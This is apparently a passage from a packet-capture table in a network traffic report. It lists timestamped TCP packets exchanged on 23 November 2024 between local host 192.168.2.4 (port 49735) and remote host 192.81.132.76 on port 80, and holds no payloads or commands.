                                                                                                                                                          Nov 23, 2024 12:47:17.986434937 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.988312006 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.988404036 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.988425016 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.991522074 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.991625071 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.992604017 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.995234966 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.995301008 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:17.995409966 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.998315096 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.998330116 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:17.998368025 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.001172066 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.001281023 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.601258993 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.601372004 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.601428032 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.602088928 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.602216959 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.602267981 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.604012966 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.604157925 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.604212999 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.605935097 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.606085062 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.606146097 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.607795954 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.607889891 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.607939005 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.609684944 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.609808922 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.609859943 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.611639023 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.611814022 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.611862898 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.613570929 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.613728046 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.613831997 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.615488052 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.615639925 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.615688086 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.617432117 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.617552042 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.617600918 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.619350910 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.619473934 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.619543076 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.621393919 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.621611118 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.621670008 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.623244047 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.623429060 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.623477936 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.625122070 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.625252962 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.625303984 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.627068043 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.627163887 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.627249956 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.628993988 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.629096031 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.629146099 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.630901098 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.631027937 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.631076097 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.632827997 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.632950068 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.633002996 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.634764910 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.634872913 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.634919882 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.636838913 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.636966944 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.637017965 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.638653040 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.638772964 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.638827085 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.640598059 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.640753031 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.640799046 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.643255949 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.643457890 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.643510103 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.644632101 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.644701958 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.644747972 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.646325111 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.646449089 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.646496058 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.648241997 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.648359060 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.648407936 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.650185108 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.650285959 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.650340080 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.652091980 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.652206898 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.652252913 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.654010057 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.654159069 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.654203892 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.655986071 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.656081915 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.656130075 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.657932043 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.658003092 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.658051014 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.659826994 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.659936905 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.659996986 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.661739111 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.661851883 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.661912918 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.663706064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.663760900 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.663810968 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.665580988 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.665708065 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.665755987 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.667501926 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.667644024 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.667690992 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.669423103 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.669553041 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.669600010 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.671360970 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.671447992 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.671494961 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.673311949 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.673399925 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.673448086 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.675221920 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.675353050 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.675403118 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.677123070 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.677248955 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.677304983 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.679078102 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.679181099 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.679230928 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.681070089 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.681147099 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.681195021 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.682908058 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.682998896 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.683048964 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.684909105 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.685012102 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.685053110 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.686795950 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.686897039 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.686949968 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.688715935 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.688851118 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.688909054 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.690630913 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.690740108 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.690789938 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.692555904 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.692666054 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.692715883 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.694494009 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.694638968 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.694686890 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.696460009 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.696537971 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.696583033 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.698327065 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.750849009 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.802175999 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.802242994 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.802289009 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.803215981 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.803348064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.803397894 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.805020094 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.805149078 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.805206060 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.806894064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.807033062 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.807087898 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.808846951 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.808937073 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.808979988 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:18.810688019 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:18.860227108 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.003536940 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.003587008 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.003648043 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.004117012 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.004199028 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.004241943 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.005687952 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.005817890 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.005857944 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.007257938 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.007309914 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.007359028 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.008888006 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.009002924 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.009048939 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.010493040 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.010612011 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.010654926 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.012120962 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.012227058 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.012269974 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.013775110 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.013932943 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.013978958 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.015405893 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.015541077 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.015582085 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.017014027 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.017131090 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.017174959 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.018884897 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.063347101 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.204438925 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.204605103 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.204657078 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.205233097 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.205331087 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.205375910 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.206880093 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.207005024 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.207051992 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.208468914 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.208602905 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.208646059 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.210094929 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.210201979 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.210244894 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.211728096 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.211944103 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.211987019 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.213355064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.213462114 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.213505030 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.214943886 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.215022087 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.215065002 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.216588020 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.216691017 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.216733932 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.218209028 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.218358040 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.218401909 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.219842911 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.219950914 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.219995022 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.221537113 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.221591949 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.221635103 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.223100901 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.223726034 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.223781109 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.224745035 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.224761009 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.224805117 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.226356030 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.226464033 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.226510048 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.227962971 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.228080988 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.228126049 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.229598045 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.229774952 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.229823112 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.231209040 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.231332064 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.231379032 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.232867956 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.233026981 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.233074903 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.234445095 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.234561920 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.234606028 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.236026049 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.282105923 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.406058073 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.406191111 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.406256914 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.406795979 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.406894922 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.407094002 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.408418894 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.408581972 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.408648968 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.410039902 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.410178900 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.410223961 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.411695004 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.411832094 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.411884069 CET4973580192.168.2.4192.81.132.76
                                                                                                                                                          Nov 23, 2024 12:47:19.413281918 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.413422108 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.414931059 CET8049735192.81.132.76192.168.2.4
                                                                                                                                                          Nov 23, 2024 12:47:19.414994001 CET4973580192.168.2.4192.81.132.76
